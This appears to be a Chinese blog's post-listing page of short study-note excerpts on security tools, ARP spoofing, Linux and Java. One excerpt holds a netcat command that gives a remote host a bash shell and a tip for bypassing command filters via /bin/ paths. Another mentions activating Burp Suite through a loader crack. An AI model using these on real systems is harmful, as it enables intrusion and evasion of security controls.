- 博客(23)
- 问答 (1)
- 收藏
- 关注
RSS订阅原创 安防初识命令【学习笔记】
nc -e /bin/bash 192.168.42.134 6666 客户端连接后启动shell。用户名:密码:uid:gid:描述性信息:主目录:默认shell (nologin为禁止登陆)/bin目录下存在大部分内核指令,可直接通过/bin/+命令绕过大多数简单的命令字符过滤。gpg --batch --passphrase 密钥 -d 需要解密的文件。gpg -o 解密后存储的文件 -d 需要解密的文件。nikto--------web安全扫描工具。10、信息收集--永恒之眼。
2023-10-13 18:32:21
319
原创 window系统进行goolge代理配置(falcon proxy+burpsuite)
linux系统自带burpsuite抓包软件,只要火狐下个代理扩展就可以抓包了,想着每次抓包还得去虚拟机抓就有点小烦躁,所以想着给自己本机也弄个burpsuite,有想法就开整!设置-隐私和安全-安全-管理设备证书-受信任的根证书颁发机构-导入cacert.der,导入时文件类型选择所有文件(*)后面就激活成功,可以正常使用,后续直接通过burpsuite.bat文件启动,无法再进行上述激活步骤。3、打开burploader.jar文件,点击run,又报错了。
2023-10-13 16:12:14
556
原创 MITM之arp欺骗
arp请求为广播形式发送,同一网段内主机可自主发送arp应答消息,欺骗者伪装成网关或被访问主机发送arp应答消息,让目标主机认为被访问主机ip的物理地址就是欺骗者的物理地址;ARP缓存表采用老化的机制,在一段时间里表中的某一行没有使用,就会被删除,这样可以大大减少ARP缓存表的长度,加快查询的速度,也成了arp欺骗利用的机制。1、不把网络安全信任关系单独建立在ip地址/mac地址上,应当ip+mac地址结合。3、若知悉网关mac地址,处于arp欺骗中可以直接进行arp加固,静态绑定网关地址。
2023-09-26 14:00:39
148
原创 【积累】-----arp的简单使用
if_addr 如果存在,此项指定地址转换表应修改的接口的 Internet 地址。2)当我们网络接口太多(装虚拟机的接口多),cmd敲完arp -a看起来真费劲,所以有时我们只是单纯想看某个接口的arp缓存表。> arp -s 157.55.85.212 00-aa-00-62-c6-09.... 添加静态项。-N if_addr 显示 if_addr 指定的网络接口的 ARP 项。1)arp -a展示所有网络接口的arp缓存表,在所有接口上查询某一目标ip绑定关系。
2023-09-21 18:03:07
452
原创 Debian LNMP架构的简单配置使用
注:php-fpm日志文件在/var/log/php8.2-fpm.log,php-fpm启动不起来,可以从日志里看报错信息。查看php-fpm配置 /etc/php/8.2/fpm/pool.d/www.conf 默认是采用第一种通信方式。主:/etc/php/8.2/fpm/php8.2-fpm.conf。子: /etc/php/8.2/fpm/pool.d/www.conf。
2023-07-28 13:42:00
1140
1
原创 Linux vsftp三种模式的简单配置部署
博主在Debian 6.1.27-1kali1 (2023-05-12) 安装的vsftpd/kali-rolling 3.0.3-13+b2 amd64在/etc目录下没有vsftpd目录,自然也没有vsftpd.user_list,而vsftp.conf文件直接在/etc下,同样在/etc目录下找到ftpusers文件,该文件的所有用户不允许登陆ftp。(文件默认开放所有全部权限666,需要减少的权限022,则默认文件权限为-rw-r--r--)
2023-07-25 20:52:06
728
原创 关于正则表达式的简单介绍以及使用【学习笔记】
"area bare arena mare" 使用正则”\bare\w*\b" 去匹配,会得到“area" ,"arena" ,”\bare\w*\b" 以“边界+以are开头的单词+边界”去匹配。多行模式改变的是"^"和"$"的匹配模式,默认模式下 "^"和"$"匹配的是整个字符串的起始位置和结束位置,而在多行模式,它们会匹配字符串内部某一行文本的起始位置和结束位置。、{n}、{n,}、{n,m}基础正则表达式:"^","$",".","*","\","[abc]","[^abc]","[a-d]"
2023-07-20 17:31:10
435
原创 浅谈linux前台进程与后台进程同步异步执行的理解
linux终端输入一条命令,创建一个子进程运行这条命令,在这条命令进程执行完之前,终端shell都无法接收新的一条命令;应该是概念混淆了,这里linux进程异步的意思,就单纯的字面意思,时间不一致,进程与shell进程不能在同一时间运行,故shell进程在前台进程运行时不能执行下一命令。同步,程序的执行顺序和任务的排列顺序是一致的、同步的,所以后一个任务要等待前一个任务结束,然后再执行。同理,与shell同步运行的,用户在它完成前可以继续在前台执行下一条命令的进程为后台进程。
2023-07-18 10:10:27
517
1
原创 Linux系统终端窗口ctrl+c,ctrl+z,ctrl+d的区别
时常在Linux系统上,执行某命令停不下来,就这几个ctrl组合键按来按去,今天稍微总结下具体差别,便于以后linux系统运维操作。2、ctrl+z暂停正在执行的进程,前台进程转为后台进程(暂停状态),同一shell进程下可使用bg命令恢复继续执行。1、ctrl+c强制中断程序,相应进程会被杀死,中断进程任务无法恢复执行。3、ctrl+d 使用过几次,类似输入exit 命令,退出某某进程,窗口。
2023-07-15 17:37:41
2531
1
原创 关于虚拟机kali系统忘记密码修改密码的操作
1、启动kali虚拟机,进入GRUB菜单,选中kali GNU/Linux 按e 进入编辑状态。4、ctrl+x或者F10 重新启动系统,即可进入单用户模式shell,现在就可以设置密码了。rw --根分区的挂载模式默认是只读(ro),以其权限变为可读可写。3、在末尾添加 rw single init=/bin/bash。5、设置完密码重启虚拟机kali系统即可正常使用了。#个人学习记录使用,若有不合理之处,欢迎指教。single --进入单用户模式。
2023-07-12 14:55:17
2959
1
原创 关于python安装第三方工具包,报错NameError: name ‘pip‘ is not defined
python安装第三方工具包,报错NameError: name 'pip' is not defined
2022-05-03 20:57:45
3137
原创 解决mysql编码格式问题
在mysql所建立的表中插入中文数据出现错误,报错Incorrect string value: '\xE6\x89\x8B\xE6\x9C\xBA' for column 'cname' at row 1;错误原因是在字段'cname'字段插入中文数据,因为建表时没有注明编码格式,则默认使用mysql默认编码latin1(瑞典)这时为了在表中出入中文数据,需要更改my...
2020-01-06 16:44:48
677
原创 进程与线程的区别
公司比作进程,公司的资产比作进程的资源。公司的员工比作线程,公司的员工共享公司的资产。也就是说线程共享整个进程的资源,同一个进程可以包括多个线程,一个进程至少包括一个线程。因为进程自身无法完成任何功能,必须进程要完成任务需要开启一个或多个线程去完成。进程与线程的区别1)进程是资源分配和调度的一个独立单元,而线程是CPU调度的基本单元。2)一个进程可以包含多个线程,并且这些线...
2019-06-06 10:54:30
207
原创 在Kali Linux虚拟机下,如何安装VMtools,并且实现将本机文件拖拽至虚拟机的功能
首先我们启动Kali linux虚拟机再安装VMware Tools,右键虚拟机弹出菜单栏,选中“安装VMware Tools”选项,点击。弹出对话框,点击“是”出现如下界面后打开光盘所在目录,找到Vmware-tools的安装压缩包,将其拷贝到其他目录下,这里我们把它拷贝到Home目录下将vmtools安装压缩包解压,输入指令tar zxvf VM...
2019-05-10 19:27:46
3562
1
原创 VMware Kali Linux虚拟机的安装教程
打开VMware Workstation,点击“创建新的虚拟机”,根据“新建虚拟机向导”进行安装。这里使用“典型”配置就行。接下来先点击“安装程序光盘映像文件”,填写自己本地Kali虚拟机的光盘镜像文件所在路径,下图是我自己Kali Linux镜像文件所在路径,填写完后,点击第三项“稍后安装操作系统”进行下一步。客户机操作系统选择“Linux”,至于版本我这里保持的是默认的,没...
2019-05-09 22:23:20
2192
原创 scanf函数与gets函数关于字符串输入换行符问题
先看下代码以及运行结果(这代码从网上拷的)#include <stdio.h>int main(){ // 先读入一个整数,再读入2个串 int a; char b1[100]; char b2[100]; scanf("%d", &a); gets(b1); gets(b2); printf("a ...
2018-12-18 14:34:11
12019
9
原创 Cisco IOS镜像文件的下载地址
文件在鸿鹄论坛那里有下载,不过鸿鹄论坛那里需要登录账号回复才能看到下载链接http://bbs.hh010.com/forum.php?mod=viewthread&tid=38658&extra=page%3D1%26filter%3Dsortid%26sortid%3D1...
2018-12-17 12:31:58
22111
13
转载 对于句柄的理解
在博客园摘录的一篇文章,原文请看https://www.cnblogs.com/barcelong/articles/1261015.html前面几个点看不太懂,看第四个点比较能理解句柄的作用一、句柄是什么?在Windows中,句柄是和对象一一对应的32位无符号整数值。对象可以 映射到唯一的句柄,句柄也可以映射到唯一的对象。 二、为什么要用到句柄?windows需要向程序员提...
2018-12-13 19:08:28
1315
转载 Java Main方法中String[] args 与 String args[]区别
单独对比 String[] args 与 String args[]来说区别不太大。执行效果上没有不同, 但在语法意义上略有不同.比如, String与String[], 前者叫字符串类型而后者叫字符串数组类型.String args[]单从类型上来讲属于字符串类型, 而从变量本身来讲是一个数组类型,因此组合起来说明此变量为一个字符串类型的数组, 也就是说数组中的所有元素都为String类型。St...
2018-05-04 14:43:26
415
原创 Java args参数输入(eclipse)
测试代码:打印一个矩形,要求输入两个参数长宽package pack3;public class PrintStar {public static void main(String args[]){ try{ int length=0; int width=0; String str1=args[0]; String str2=args[1]; length=Integer.parseInt(st...
2018-05-04 14:41:23
3385
原创 Java中换行语句
(1)System.out.println();(2)System.out.print("\n");换多行可以使用第二种方法多加几个\n就行了
2018-05-04 14:18:45
13129
原创 java中的输入操作
Java中输入一般是通过导入Scanner类来实现的:具体步骤如下:(1)创建Scanner对象,接受从控制台输入Scanner input=new Scanner(System.in);(2) 接受String类型String str=new input.next();//string比较特殊,不是input.nextString()(3)接受int类型int n=input.nextInt()...
2018-04-08 15:03:11
577
转载 在windows命令行窗口运行Java程序代码中出现package报错无法加载主类
如果要在cmd命令行中,使用java运行java程序,可能会出现如下问题:观看一下datademo1.java的代码package hjfjhf;public class DataDemo1 {public static void main(String[] args) { int max=Integer.MAX_VALUE; System.out.println("整型的最大值:"+max); ...
2018-04-04 18:07:46
1292
空空如也
敏捷开发的几道题,考试遇到的,不知道答案,多选题
2021-08-13
TA创建的收藏夹 TA关注的收藏夹
TA关注的人